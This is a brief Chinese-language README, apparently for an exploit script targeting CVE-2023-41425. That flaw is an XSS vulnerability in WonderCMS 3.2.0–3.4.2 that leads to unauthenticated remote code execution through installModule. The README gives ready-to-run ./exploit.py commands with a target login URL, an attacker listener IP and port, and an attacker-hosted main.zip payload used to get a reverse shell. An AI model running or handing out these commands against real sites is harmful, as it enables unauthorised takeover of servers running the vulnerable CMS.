WonderCMS v3.2.0 至 v3.4.2 版本存在 XSS 漏洞,恶意攻击者可通过向 installModule 上传组件实现远程代码执行(无需知道密码)。对应 CVE-2023-41425。
指定下载 main.zip 文件的远程主机
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip
或者不指定 main.zip 文件。默认从 main.zip 下载
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321
